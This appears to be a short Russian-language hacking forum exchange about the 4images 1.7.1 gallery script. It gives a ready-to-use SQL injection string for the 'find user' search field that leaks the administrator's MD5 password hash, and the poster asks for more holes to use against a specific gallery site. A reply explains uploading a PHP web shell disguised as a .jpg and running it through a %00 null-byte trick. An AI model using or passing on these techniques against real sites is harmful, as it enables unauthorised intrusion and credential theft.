Скрипт 4images 1.7.1
Опасность критическая
сайт производителя http://www.4homepages.de/
если в разделе "расширенный поиск" в поле "найти юзера" ввести
[Admin nick]' union select user_password from 4images_users where user_name LIKE '[Admin nick]
то скрипт в ошибку выдаст зашифрованный мд5хеш админа
вот здесь - http://forum.web-hack.ru/index.php?showtopic=32196
мне попытались немного помочь и указали на несколько дырок, но я о этих дырках знаю и их уже закрыли на интересующем сайте-галерее. может быть кто-то ещё что-то знает?
slime, смотри видео на античате, подробно описано что и как.
Заливаешь шел с расширением jpg, при просмотре картинки добавляем символ конца сроки %00, и php скрипт выпоkyится.